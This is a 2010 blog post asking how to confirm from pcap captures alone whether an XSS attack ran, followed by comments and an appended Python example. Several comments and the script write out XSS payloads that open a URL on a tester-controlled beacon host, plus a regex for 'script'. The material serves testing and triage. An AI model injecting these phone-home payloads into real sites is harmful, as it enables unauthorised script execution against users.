Wednesday, November 3, 2010

XSS without Browser

To all Sec guys, I have been cracking my brain over the past 2 weeks thinking about how to verify successful XSS attacks without using a browser. I know it sounds absurd, but that's the way it is. All I have are pcap files. From those pcap files, we can obviously search for the word "script" or other variants of XSS attacks using regular expressions. However, how do we know if an attempt was successfully executed or is just a false positive? Looking at the HTTP 200 response code tells me that the attempt went through, but how do we know if we were truly exploited? JavaScript maybe?

The Hacka Man

7 comments:

Michael Hendrickx said...

You can see if the JavaScript came back with the HTTP response, unfiltered.

If you see a <script> .... or a < script > tag, that would indicate it could be executed, assuming the browser has JavaScript enabled.



jailbreaking iPhone 4s said...

Can't think of any solution around it, but I think that everyone uses a browser, so no one needs to use this approach.

Anonymous said...

easy.

javascript:window.open('http://success.yourdomain.com/uid');

each payload gets a uid, search for your 'success' domain in the pcaps.

That "phone-home" technique works in all sorts of JavaScript runtime environments, not just browsers, but Rhino and others as well...
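An added example, not part of the original post or any of the comments, that puts the two checks suggested above side by side: the reflection check (did the payload come back in the response body unfiltered, or only entity-encoded?) and the phone-home correlation (one unique id per payload, then search the capture for requests to a beacon host). It works on text you have already pulled out of a pcap, so no capture library is needed; the HTTP bodies and request lines below are constructed sample data, and `success.example.com` is an assumed beacon host you would control.

```python
"""Offline triage of XSS hits in captured HTTP traffic (added example).

 1. classify_reflection(): was the injected payload reflected unfiltered
    (a real chance of execution) or only HTML-entity-encoded (false positive)?
 2. make_payloads() / fired_payloads(): give every payload its own id and
    map beacon requests found in the capture back to the injection point.
All sample data here is constructed, not taken from a real capture.
"""
import html
import re
import uuid

PROBE = "<script>alert(1)</script>"

# Constructed response bodies standing in for what you would extract from a pcap.
RESPONSES = {
    "unfiltered": "<html><body>Hello <script>alert(1)</script></body></html>",
    "encoded": "<html><body>Hello &lt;script&gt;alert(1)&lt;/script&gt;</body></html>",
    "absent": "<html><body>Hello guest</body></html>",
}

SCRIPT_RE = re.compile(r"script", re.IGNORECASE)


def naive_hit(body):
    """The plain 'grep for script' check from the post: fires on encoded text too."""
    return bool(SCRIPT_RE.search(body))


def classify_reflection(payload, body):
    """'unfiltered' if the payload came back byte-for-byte, 'encoded' if only an
    HTML-entity-encoded copy came back (the server neutralised it), else 'absent'."""
    if payload in body:
        return "unfiltered"
    if html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


BEACON_HOST = "success.example.com"  # assumption: a host the tester controls


def make_payloads(targets, beacon_host=BEACON_HOST):
    """One phone-home payload per injection point, each carrying a unique id.
    Returns {uid: {"target": ..., "payload": ...}} so a beacon hit can be
    traced back to the exact injection point that fired."""
    book = {}
    for target in targets:
        uid = uuid.uuid4().hex
        book[uid] = {
            "target": target,
            "payload": f"<script>window.open('http://{beacon_host}/{uid}')</script>",
        }
    return book


# Request line followed by its Host header, as reassembled from the capture.
REQUEST_RE = re.compile(
    r"^(?:GET|POST) /([0-9a-f]{32}) HTTP/1\.[01]\r?\nHost: ([^\r\n]+)", re.M
)


def fired_payloads(capture_text, book, beacon_host=BEACON_HOST):
    """Return the injection points whose payload actually phoned home."""
    fired = []
    for uid, host in REQUEST_RE.findall(capture_text):
        if host.strip().lower() == beacon_host and uid in book:
            fired.append(book[uid]["target"])
    return fired


if __name__ == "__main__":
    for name, body in RESPONSES.items():
        print(f"{name:10s} grep-hit={naive_hit(body)!s:5s} "
              f"reflection={classify_reflection(PROBE, body)}")
    book = make_payloads(["/search?q=", "/comment"])
    some_uid = next(iter(book))
    capture = (
        "GET /index.html HTTP/1.1\r\nHost: victim.example\r\n\r\n"
        f"GET /{some_uid} HTTP/1.1\r\nHost: {BEACON_HOST}\r\n\r\n"
    )
    print("fired:", fired_payloads(capture, book))
```

The "encoded" body shows why the regex alone misleads: it still contains the word `script`, so the grep fires, yet the browser would render it as text. The phone-home check is the only one of the two that proves execution rather than reflection; it does require that the victim could reach the beacon host while the capture was being taken.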

